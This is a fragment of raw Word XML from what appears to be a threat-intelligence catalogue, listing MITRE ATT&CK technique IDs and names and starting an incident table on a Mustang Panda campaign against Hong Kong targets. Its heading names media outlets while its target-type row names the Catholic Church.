        <w:t xml:space="preserve"> Collection ['T1560.003', 'T1119', 'T1074.001', 'T1560.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658A5CF0"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T1560.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Archive Collected Data&gt;:Archive via Custom Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081C5562"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1119 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Automated Collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42043D2F"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T1074.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Data Staged&gt;:Local Data Staging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AC10D6"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T1560.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Archive Collected Data&gt;:Archive via Utility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0EB6A2"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0011 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Command and Control ['T1102', 'T1573.001', 'T1105', 'T1219', 'T1071.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52815D56"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1102 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Web Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E68914"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715AFE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1573.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00715AFE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Encrypted Channel&gt;:Symmetric Cryptography</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7225A020" w14:textId="77777777" w:rsidR="00B14585" w:rsidRPr="00B34D84" w:rsidRDefault="00B14585" w:rsidP="00C83F73">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:r w:rsidRPr="00B34D84">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B34D84">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1105 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B34D84">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ingress Tool Transfer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287CDFFE"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Next Technique is T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1219 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Remote Access Software</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A9CA32"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T1071.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Application Layer Protocol&gt;:Web Protocols</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BEBF79" w14:textId="77777777" w:rsidR="00B14585" w:rsidRPr="00B14585"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0010 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exfiltration ['T1052.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC46098" w14:textId="77777777" w:rsidR="00B14585" w:rsidRPr="00B14585" w:rsidRDefault="00B14585" w:rsidP="00C83F73">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1052.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Exfiltration Over Physical Medium&gt;:Exfiltration over USB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163F2B17" w14:textId="21BA86AE" w:rsidR="00B14585" w:rsidRPr="005935F8" w:rsidRDefault="00B14585" w:rsidP="00C83F73">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Next tactic is TA</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0040 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Impact []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B352AC" w14:textId="77777777" w:rsidR="00B14585" w:rsidRDefault="00B14585" w:rsidP="00B14585">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="121" w:name="_Toc153480895"/>
      <w:r>
        <w:t xml:space="preserve">T1566.001 - </w:t>
      </w:r>
      <w:r w:rsidRPr="005B4630">
        <w:t>China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets</w:t>
      </w:r>
      <w:bookmarkEnd w:id="121"/>
    </w:p>
    <w:p w14:paraId="4577769D" w14:textId="77777777" w:rsidR="00B14585" w:rsidRDefault="00B14585" w:rsidP="00B14585">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B14585" w:rsidRPr="002D1D50" w14:paraId="5D8379F9" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="130E2E9E" w14:textId="77777777" w:rsidR="00B14585" w:rsidRPr="002D1D50" w:rsidRDefault="00B14585" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Dimension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="221F251D" w14:textId="6E060CEF" w:rsidR="00B14585" w:rsidRPr="002D1D50" w:rsidRDefault="001F5FE0" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FDF887A" w14:textId="77777777" w:rsidR="00B14585" w:rsidRPr="00387DCC" w:rsidRDefault="00B14585" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00387DCC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5FE0" w:rsidRPr="00B857D7" w14:paraId="3AE516F5" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C1C6EFD" w14:textId="77777777" w:rsidR="001F5FE0" w:rsidRDefault="001F5FE0" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attribution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69DAE967" w14:textId="2B7C3C22" w:rsidR="001F5FE0" w:rsidRDefault="001F5FE0" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Mustang Panda</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E38FA40" w14:textId="77777777" w:rsidR="001F5FE0" w:rsidRPr="00387DCC" w:rsidRDefault="001F5FE0" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B14585" w:rsidRPr="00B857D7" w14:paraId="7F38E177" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17EB3481" w14:textId="77777777" w:rsidR="00B14585" w:rsidRPr="007328DE" w:rsidRDefault="00B14585" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Initial Access Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3549F3AF" w14:textId="77777777" w:rsidR="00B14585" w:rsidRPr="007328DE" w:rsidRDefault="00B14585" w:rsidP="00473869">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71164A9A" w14:textId="77777777" w:rsidR="00B14585" w:rsidRPr="00387DCC" w:rsidRDefault="00B14585" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B14585" w:rsidRPr="00B857D7" w14:paraId="1CC915F9" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="442E853F" w14:textId="77777777" w:rsidR="00B14585" w:rsidRDefault="00B14585" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attack Origin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47BA94D5" w14:textId="77777777" w:rsidR="00B14585" w:rsidRPr="007328DE" w:rsidRDefault="00B14585" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>China</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BEC8C24" w14:textId="77777777" w:rsidR="00B14585" w:rsidRPr="00387DCC" w:rsidRDefault="00B14585" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B14585" w:rsidRPr="00B857D7" w14:paraId="2FC04F33" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="695CC394" w14:textId="77777777" w:rsidR="00B14585" w:rsidRDefault="00B14585" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26C7E19B" w14:textId="77777777" w:rsidR="00B14585" w:rsidRDefault="00B14585" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Hong Kong</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D26ACCE" w14:textId="77777777" w:rsidR="00B14585" w:rsidRPr="00387DCC" w:rsidRDefault="00B14585" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B14585" w:rsidRPr="00B857D7" w14:paraId="3FFD9B6E" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FAB34BC" w14:textId="77777777" w:rsidR="00B14585" w:rsidRDefault="00B14585" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66130F00" w14:textId="19C393C3" w:rsidR="00B14585" w:rsidRDefault="008C62FB" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Catholic </w:t>
            </w:r>
            <w:r w:rsidR="003B449B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Church</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="043352D6" w14:textId="77777777" w:rsidR="00B14585" w:rsidRPr="00387DCC" w:rsidRDefault="00B14585" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B14585" w:rsidRPr="00B857D7" w14:paraId="5E5EE4A3" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F40B3EF" w14:textId="77777777" w:rsidR="00B14585" w:rsidRDefault="00B14585" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7043C405" w14:textId="77777777" w:rsidR="00B14585" w:rsidRDefault="00B14585" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72C3D8BE" w14:textId="3C865170" w:rsidR="00B14585" w:rsidRDefault="00C75A1E" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1] “</w:t>
            </w:r>
            <w:r w:rsidRPr="00C75A1E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>making his successor a valuable target for intelligence gathering ahead of the deal’s expiry and likely renewal in September 2020</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B14585" w:rsidRPr="00B857D7" w14:paraId="3CEA4F01" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7976258A" w14:textId="77777777" w:rsidR="00B14585" w:rsidRDefault="00B14585" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Vulnerabilities Exploited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="448B27A7" w14:textId="1EB7B871" w:rsidR="00B14585" w:rsidRDefault="00B14585" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="297D09B6" w14:textId="77777777" w:rsidR="00B14585" w:rsidRDefault="00B14585" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B14585" w:rsidRPr="00B857D7" w14:paraId="2558CE9B" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03E5A292" w14:textId="77777777" w:rsidR="00B14585" w:rsidRDefault="00B14585" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Related Attack Patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B9A8046" w14:textId="77777777" w:rsidR="00B14585" w:rsidRDefault="00B14585" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1137D0FA" w14:textId="19D58E64" w:rsidR="00B14585" w:rsidRDefault="00B14585" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00873778" w:rsidRPr="00B857D7" w14:paraId="158B82E1" w14:textId="77777777" w:rsidTr="0016701B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10DFD3E3" w14:textId="77777777" w:rsidR="00873778" w:rsidRDefault="00873778" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Preceded By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75D06B87" w14:textId="77777777" w:rsidR="00873778" w:rsidRDefault="00873778" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57B9FF7F" w14:textId="6AB1F272" w:rsidR="00873778" w:rsidRDefault="00873778" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00873778" w:rsidRPr="00B857D7" w14:paraId="2C64E678" w14:textId="77777777" w:rsidTr="0016701B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2428C01E" w14:textId="77777777" w:rsidR="00873778" w:rsidRDefault="00873778" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Schema Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A5EF239" w14:textId="77777777" w:rsidR="00873778" w:rsidRDefault="00873778" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="377F5ECE" w14:textId="7511D2AC" w:rsidR="00873778" w:rsidRDefault="00873778" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B14585" w:rsidRPr="00B857D7" w14:paraId="647CF7BE" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
